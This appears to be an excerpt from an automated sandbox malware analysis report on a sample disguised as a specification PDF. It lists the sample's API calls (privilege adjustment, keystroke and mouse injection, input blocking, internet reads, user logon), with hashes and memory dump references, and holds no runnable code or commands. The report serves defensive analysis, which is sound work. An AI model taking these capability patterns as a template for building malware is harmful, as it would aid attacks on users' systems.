                                      Similarity
                                      • API ID: Proc$LongWindow
                                      • String ID:
                                      • API String ID: 2749884682-0
                                      • Opcode ID: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                      • Instruction ID: feda2bfcc857351bb1baf153f799470235cbaaba1caa10447ac277056fd96716
                                      • Opcode Fuzzy Hash: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                      • Instruction Fuzzy Hash: 00A15B70114005BADB3B6F2E4C89EFFA95CEB4234AF11492DFD01EADB1CB259D099672
                                      APIs
                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003943BF,00000000), ref: 00394FA6
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00394FD2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$AvailableDataFileQueryRead
                                      • String ID:
                                      • API String ID: 599397726-0
                                      • Opcode ID: 51f033dd84e6fee1370ad8d359166d48eacb48bdf60d8c5db23f7fc0266f1dce
                                      • Instruction ID: 2dac383d3b9351cb3e78b6beaf96d6b865f354804ad279e64c166db48c920db1
                                      • Opcode Fuzzy Hash: 51f033dd84e6fee1370ad8d359166d48eacb48bdf60d8c5db23f7fc0266f1dce
                                      • Instruction Fuzzy Hash: 6541C77150460ABFEF239F94DC85EBFB7BCEB40754F10406EF606A6181EA719E4297A0
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0038EB8A
                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0038EBE0
                                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0038EC0E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstNext
                                      • String ID:
                                      • API String ID: 3541575487-0
                                      • Opcode ID: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                      • Instruction ID: 1e5cfc3a5b6b76536c7fbb156b7366537efda2d994c73a91a5f63cc95b00db8c
                                      • Opcode Fuzzy Hash: 8a225064de2162a2a65518aa4079735a89bef32f2b3f784d8071897eeb28b9b5
                                      • Instruction Fuzzy Hash: CD41AD356043018FC71AEF28C491E9AB3E8FF4A324F10459DFA5A8B3A1DB31B944CB91
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0038E20D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0038E267
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0038E2B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID:
                                      • API String ID: 1682464887-0
                                      • Opcode ID: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                      • Instruction ID: 4e72fb554b14474ad5eb9f14ccf74022327f422870c28e8a56450e8d49c21976
                                      • Opcode Fuzzy Hash: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                      • Instruction Fuzzy Hash: B5213135A00218DFDB01EF95D885EAEBBB8FF49310F1484A9E946EB261DB31A905CB50
                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                      • GetLastError.KERNEL32 ref: 0037B1BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                      • String ID:
                                      • API String ID: 4244140340-0
                                      • Opcode ID: 53f03cc2540fc3826e134b27be3f707bb218f7eb3b58b6f6eb9fc0e86b461eef
                                      • Instruction ID: 915be22b454caaad652f85f940d69bc3d82305f5284ae58f3120ccb501087e5a
                                      • Opcode Fuzzy Hash: 53f03cc2540fc3826e134b27be3f707bb218f7eb3b58b6f6eb9fc0e86b461eef
                                      • Instruction Fuzzy Hash: 7F11CEB2400204AFE729AF68DCC5D2BB7BCFB44310B20852EF45A97650EB74FC418B60
                                      APIs
                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00386623
                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00386664
                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0038666F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      • Opcode ID: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                      • Instruction ID: 6bcd5af943c2f1051fb885492bceec41bffbf3da9c407505268529f9e9ba61ab
                                      • Opcode Fuzzy Hash: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                      • Instruction Fuzzy Hash: 5C111E71E01228BFDB119FA5DC45FAEBBBCEB85B10F104166F900E6290D7B05A058BA5
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00387223
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0038723A
                                      • FreeSid.ADVAPI32(?), ref: 0038724A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                      • String ID:
                                      • API String ID: 3429775523-0
                                      • Opcode ID: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                      • Instruction ID: c602cfd5944d227768445864c50f5a420866230c51cefedc715a79159464715c
                                      • Opcode Fuzzy Hash: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                      • Instruction Fuzzy Hash: B3F0FF75904219BBDB05DBE8DD89EADBBBDEB08301F104469A502E2191E270A6458B10
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 0038F599
                                      • FindClose.KERNEL32(00000000), ref: 0038F5C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID:
                                      • API String ID: 2295610775-0
                                      • Opcode ID: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                      • Instruction ID: 56523cf24332ba623d7e39eb746d448078d0be5b039f793157fa5ee936579fc5
                                      • Opcode Fuzzy Hash: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                      • Instruction Fuzzy Hash: 4D11C4316002009FD711EF28D845E2EB3E8FF85325F04896EF8A6DB2A1CB30BD048B85
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEA7
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ErrorFormatLastMessage
                                      • String ID:
                                      • API String ID: 3479602957-0
                                      • Opcode ID: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                      • Instruction ID: 021cc91f8f168a9e5d2b19295ddc77d7f934a49d3dfa845ce86ab3f3384621a8
                                      • Opcode Fuzzy Hash: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                      • Instruction Fuzzy Hash: 0DF08235111329ABDB11ABA4DC49FEA776DBF08351F008165F915E6181D770AA40CBA0
                                      APIs
                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00384153
                                      • keybd_event.USER32(?,7617A2E0,?,00000000), ref: 00384166
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: InputSendkeybd_event
                                      • String ID:
                                      • API String ID: 3536248340-0
                                      • Opcode ID: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                      • Instruction ID: 47ed2347eaffa4f778c14809b24d0e738507f819d67f3c4c6adb6ba6e25a6bce
                                      • Opcode Fuzzy Hash: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                      • Instruction Fuzzy Hash: B7F06D7090034EAFDB069FA0C809BBE7BB4EF00305F008059F96596191D77996129FA0
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                      • CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AdjustCloseHandlePrivilegesToken
                                      • String ID:
                                      • API String ID: 81990902-0
                                      • Opcode ID: 7cc5433f76a77575e441bec59e5beb30381fbcab79cde166354f03b2905a763f
                                      • Instruction ID: 17cf7a4dbe3ab899857ab988496a5320d1a9bc942a3710a498397d28fc72923e
                                      • Opcode Fuzzy Hash: 7cc5433f76a77575e441bec59e5beb30381fbcab79cde166354f03b2905a763f
                                      • Instruction Fuzzy Hash: C0E0B676000610AFE7262F64EC09D76BBADEB44321B208839B89A85870DB62AC949B50
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00366DB3,-0000031A,?,?,00000001), ref: 003681B1
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003681BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                      • Instruction ID: 969d538149f7b068e648568b120c08fa81f8ed6d7fec25e94e71d5536edabd24
                                      • Opcode Fuzzy Hash: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                      • Instruction Fuzzy Hash: FDB09236044648ABDB022BA1EC09F587F6CEB48752F014021F60D840618B7264108B92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \Q?
                                      • API String ID: 0-2401325038
                                      • Opcode ID: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                      • Instruction ID: bf73d9f3df542fe61645aefd980ab387fabbe47d01d33d5e22e670c72516b2d4
                                      • Opcode Fuzzy Hash: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                      • Instruction Fuzzy Hash: 77A23B74904219CFCB26CF58C880BADBBF5FF49314F2681A9D859AB391D734AE81DB50
                                      APIs
                                      • RaiseException.KERNEL32(?,00000000,00000001,?,?,00000008,?,?,0036CCBC,?,?,00000008,?,?,00375AC4,00000000), ref: 0036CEEC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      • Opcode ID: 3472466c3429d668d2dc29b88c2548dd7754f4b7fe6bea1655e858a2a232f874
                                      • Instruction ID: 87d42306c4f742aff1f0bdd23427ae6277ae62a9206620cd3af741f0aeeb69ff
                                      • Opcode Fuzzy Hash: 3472466c3429d668d2dc29b88c2548dd7754f4b7fe6bea1655e858a2a232f874
                                      • Instruction Fuzzy Hash: 6AB14A316206089FD716CF28C48AB647BE1FF44365F26D658E8DACF2A5C736E991CB40
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00396ACA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: BlockInput
                                      • String ID:
                                      • API String ID: 3456056419-0
                                      • Opcode ID: 01d7372ce15ac00d2f04cb6cb62b29ce4c9fa7928220f8c530be5163d9cc9b2d
                                      • Instruction ID: 7281cde32ad78e31d045d7f07e3f12ba0205689d9765d77592aad4ce1af4082e
                                      • Opcode Fuzzy Hash: 01d7372ce15ac00d2f04cb6cb62b29ce4c9fa7928220f8c530be5163d9cc9b2d
                                      • Instruction Fuzzy Hash: 49E048752002046FC701EF5DD405D56B7ECAFB4751F04C826F945DB261DAB4F8048B90
                                      APIs
                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003874DE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: mouse_event
                                      • String ID:
                                      • API String ID: 2434400541-0
                                      • Opcode ID: a9238f93f2a4dfef7f4244d6f584b04af948ac84af14987a36314b26b9c8a046
                                      • Instruction ID: f55e8c025028b3f9f5e8087677e8d45ba3067b661686cd29631404b781d3f10e
                                      • Opcode Fuzzy Hash: a9238f93f2a4dfef7f4244d6f584b04af948ac84af14987a36314b26b9c8a046
                                      • Instruction Fuzzy Hash: BBD017A116C30528E86B27268C0FE760D0AB3017C0FA281C9B082CB4C2A890E8419322
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0037AD3E), ref: 0037B124
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: ac8a7684495a53c0dad433adb5449fddeb46ab76e396277b510fbcc10450e00e
                                      • Instruction ID: 3ddd800b0238830e31928f434938351b97faafc4bfb7e6c4565cb1f22d8a9e48
                                      • Opcode Fuzzy Hash: ac8a7684495a53c0dad433adb5449fddeb46ab76e396277b510fbcc10450e00e
                                      • Instruction Fuzzy Hash: 4FD09E321A465EAEDF025FA4DC06EAE3F6AEB04701F448511FA15D50A1C675D532AB50
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: 659aea33b55f52a57caeb1639e4dd61203741273133debf77e9beadda54fdb7f
                                      • Instruction ID: b4d09410828885e75fd20503df3b4c4f8771999a64d7ad7048d55cbd827a7c28
                                      • Opcode Fuzzy Hash: 659aea33b55f52a57caeb1639e4dd61203741273133debf77e9beadda54fdb7f
                                      • Instruction Fuzzy Hash: 9AC04CB1400519DFC752CBC4C944DEEBBBCAB04705F104091A205F1510D7709B459B72
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0036818F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: bbe10ca8d1f228efb2e57369ccff9672afad8825d41c9cb50f1e7a10eca280fa
                                      • Instruction ID: c0941c94a92eba0e3fb1f1d5d24a2bf024f9d3ae856ecc726d16c9ef3ea4985a
                                      • Opcode Fuzzy Hash: bbe10ca8d1f228efb2e57369ccff9672afad8825d41c9cb50f1e7a10eca280fa
                                      • Instruction Fuzzy Hash: 00A0113200020CAB8F022B82EC088883F2CEA002A0B000022F80C800208B22A8208A82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                       • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
